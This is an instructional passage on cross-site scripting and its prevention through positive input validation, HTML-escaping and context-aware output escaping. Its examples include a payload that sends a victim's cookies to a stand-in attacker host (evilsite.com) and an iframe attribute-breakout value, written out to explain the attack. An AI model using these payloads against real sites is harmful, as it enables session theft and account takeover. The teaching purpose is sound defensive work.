Cross-Site Scripting

Not all security problems related to JavaScript are the fault of the browser. Sometimes the creator of a Web application is to blame. Consider a site that accepts a user name in form input and then displays it in the page. Entering the name “Fred” and clicking Submit might load a URL like http://www.example.com/mycgi?username=Fred, and the following snippet of HTML would appear in the resulting page:

Hello, <b>Fred</b>!

But what happens if someone can get you to click on a link to http://www.example.com/mycgi?username=Fred<script>alert('Uh oh');</script>? The CGI might write the following HTML into the resulting page:

Hello, <b>Fred<script>alert('Uh oh');</script></b>

The script passed in through the username URL parameter was written directly into the page, and its JavaScript is executed as normal.
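The flaw can be sketched in a few lines. The handler below is hypothetical (the source does not show the CGI's code, and the name renderGreetingUnsafe is made up for illustration); it assumes the server simply concatenates the decoded username parameter into the markup:

```javascript
// Hypothetical handler: builds the greeting by plain string concatenation,
// which is the mistake described above.
function renderGreetingUnsafe(username) {
  return "Hello, <b>" + username + "</b>!";
}

// Build the kind of link an attacker might send, then read the parameter
// back the way a server-side framework typically would (already decoded).
const payload = "Fred<script>alert('Uh oh');</script>";
const link = new URL(
  "http://www.example.com/mycgi?username=" + encodeURIComponent(payload)
);
const username = link.searchParams.get("username");

// The attacker's markup ends up in the page unchanged.
const unsafePage = renderGreetingUnsafe(username);
console.log(unsafePage);
```

Nothing in this handler distinguishes a name from markup, so whatever arrives in the parameter becomes part of the page.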

This exceedingly undesirable behavior is known as cross-site scripting (commonly referred to as XSS). It allows JavaScript created by attackers to be “injected” into pages on your site. The previous example was relatively benign, but the URL could easily have contained more malicious script. For example, consider the following URL:

http://www.example.com/mycgi?username=Fritz%3Cscript%3E%0A%28new%20Image%29.src%3D
%27http%3A//www.evilsite.com/%3Fstolencookie%3D%27%2Bescape%28document.cookie%29%3B%
0A%3C/script%3E

First, note that potentially problematic characters such as <, :, and ? have been URL encoded so as not to confuse the browser. Now consider the resulting HTML that would be written into the page:

Hello, <b>Fritz <script>
(new Image).src='http://www.evilsite.com/?stolencookie='+
escape(document.cookie);
</script></b>

This script causes the browser to try to load an image from www.evilsite.com, and includes in the URL any cookies the user has for the current site (www.example.com). The fact that this image doesn’t exist is not important; the user won’t see it anyway. What is important is to notice that the attacker presumably runs www.evilsite.com, and now only has to look through his logs in order to find cookies that have been stolen from unsuspecting users. Since most sites store login information in cookies, this could potentially let the attacker log in with his victims’ identities.

Cross-site scripting attacks aren’t limited to stealing cookies. Anything undesirable that is prevented by the same origin policy could happen. For example, the script could just as easily have snooped on the user’s keypresses and sent them to www.evilsite.com. The same origin policy doesn’t apply here: the browser has no way of knowing that www.example.com didn’t intend for the script to appear in the page.

Preventing Cross-Site Scripting

You should use a two-pronged approach to preventing cross-site scripting attacks. The first tenet is to always positively validate user input at the server (i.e., in your CGI, PHP, and so on). You should check submitted form values against regular expressions that are known to be “good” (or use equivalent logic to make the determination). This is as opposed to checking values for undesirable characters, which we term “negative” validation. For example, if usernames are supposed to be alphanumeric characters, ensure that inputs match a regular expression such as ^[a-zA-Z0-9]+$ instead of looking for potentially problematic non-alphanumeric characters. Positive matching is superior to negative matching because there’s no opportunity to make a mistake by forgetting to search for a particular “bad” character.
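As a minimal sketch of positive validation, the check below uses the regular expression from the paragraph above. The function name isValidUsername is an assumption made for illustration, and the check is written in JavaScript only for consistency with the rest of the chapter; the same test belongs in whatever language runs on your server:

```javascript
// Accept only values that match the known-good pattern from the text.
const USERNAME_PATTERN = /^[a-zA-Z0-9]+$/;

// Hypothetical helper: returns true only for non-empty alphanumeric strings.
function isValidUsername(value) {
  return typeof value === "string" && USERNAME_PATTERN.test(value);
}

console.log(isValidUsername("Fred"));
console.log(isValidUsername("Fred<script>alert('Uh oh');</script>"));
```

Because the pattern lists what is allowed rather than what is forbidden, an input containing a character nobody thought to blacklist is still rejected.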

The second approach is to always HTML-escape data before writing it into a Web page. HTML-escaping replaces meaningful HTML characters such as < and > with their entity equivalents, in this case &lt; and &gt;. Doing so ensures that even if malicious input makes it past your input validation code, it will be rendered harmless when written into the page.
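A minimal sketch of HTML-escaping for text placed between tags follows. The names escapeHtml and renderGreeting are hypothetical, and the function also escapes the ampersand (first, so that the entities it produces are not escaped a second time), which the paragraph above does not mention explicitly:

```javascript
// Replace characters that are meaningful in HTML text with entities.
// The ampersand is handled first so "&lt;" is not turned into "&amp;lt;".
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hypothetical greeting handler that escapes the name before output.
function renderGreeting(username) {
  return "Hello, <b>" + escapeHtml(username) + "</b>!";
}

console.log(renderGreeting("Fred<script>alert('Uh oh');</script>"));
```

With this in place the browser displays the injected tags as literal text instead of running them.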

Note that how data must be escaped to be safe for output (termed output sanitization) depends on how it is written into the page. For example, suppose the user passes in a URL to be written into an <iframe>:

<iframe src="VALUEGOESHERE"> </iframe>

An attacker could pass in http://somelegitsite.com"%20onload="evilJSFunction()" as the URL (%20 is a space). This would be decoded and inserted into the page, resulting in:

<iframe src="http://somelegitsite.com" onload="evilJSFunction()"> </iframe>

Merely escaping < and > is not sufficient; you need to be aware of the context of output as well. A policy of escaping &, <, >, and parentheses, as well as single and double quotes, is often the best way to go.
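The broader policy can be sketched as follows. The helper names escapeForHtml and renderIframe are assumptions made for illustration, as is the choice of numeric entities for the quote and parenthesis characters:

```javascript
// Entities for every character named in the policy above.
const ENTITY_MAP = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
  "(": "&#40;",
  ")": "&#41;",
};

// Hypothetical helper: escape each listed character in a single pass.
function escapeForHtml(text) {
  return String(text).replace(/[&<>"'()]/g, (ch) => ENTITY_MAP[ch]);
}

// Hypothetical handler that writes a user-supplied URL into an attribute.
function renderIframe(src) {
  return '<iframe src="' + escapeForHtml(src) + '"> </iframe>';
}

// The attack value from the text, after URL decoding.
const attack = 'http://somelegitsite.com" onload="evilJSFunction()"';
const safeMarkup = renderIframe(attack);
console.log(safeMarkup);
```

Because the double quote is now written as an entity, the attacker's value can no longer close the src attribute and start a new one. Escaping does not check where the URL itself points, so that remains a job for input validation.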

Output sanitization can be tricky, and requires an in-depth knowledge of HTML, CSS, JavaScript, and proprietary browser technologies to be effective. Readers interested in learning more about cross-site scripting and Web application security in general might benefit from reading the Open Web Application Security Project (OWASP) Guide, currently found at http://www.owasp.org/documentation/guide.